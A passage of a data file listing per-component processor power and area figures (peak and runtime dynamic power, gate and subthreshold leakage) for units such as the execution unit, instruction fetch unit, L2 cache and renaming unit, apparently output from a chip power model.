'Renaming Unit/Free List/Runtime Dynamic': 0.0227002,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.15395,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.809544,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.72128,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.241651,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.392492,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.30419,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.339632,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.547813,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.276518,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.16396,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.18849,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.49025,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.246389,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0142457,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.193517,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.105356,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.439906,
'Execution Unit/Register Files/Runtime Dynamic': 0.119601,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.468112,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.916376,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.99781,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00082015,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00082015,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000712972,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000275249,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00151344,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00386671,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00791277,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.101281,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.252422,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.343996,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96396,
'Instruction Fetch Unit/Runtime Dynamic': 0.709478,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.066792,
'L2/Runtime Dynamic': 0.00485081,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.9995,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.849647,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.057017,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.057017,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.26874,
'Load Store Unit/Runtime Dynamic': 1.18785,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.140594,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.281188,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0498974,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0508929,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0414031,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.641818,
'Memory Management Unit/Runtime Dynamic': 0.092296,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 23.021,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.648137,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0232109,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.157205,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.828553,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.82084,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.242713,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.393326,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.31004,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.339927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.54829,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.276759,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.16498,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.187931,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.4994,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.247494,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0142581,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.194,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.105447,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.441494,
'Execution Unit/Register Files/Runtime Dynamic': 0.119705,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.469395,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.917169,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 3.00055,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000814706,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000814706,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000708274,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000273455,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00151476,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00385244,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00785899,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.101369,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.25153,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.344295,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96396,
'Instruction Fetch Unit/Runtime Dynamic': 0.708906,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0668276,
'L2/Runtime Dynamic': 0.00524646,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.98998,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.845528,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0567091,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0567091,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.25777,
'Load Store Unit/Runtime Dynamic': 1.18191,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.139835,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.27967,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0496279,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.050624,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0412566,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.641356,
'Memory Management Unit/Runtime Dynamic': 0.0918807,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 23.0188,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.651043,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
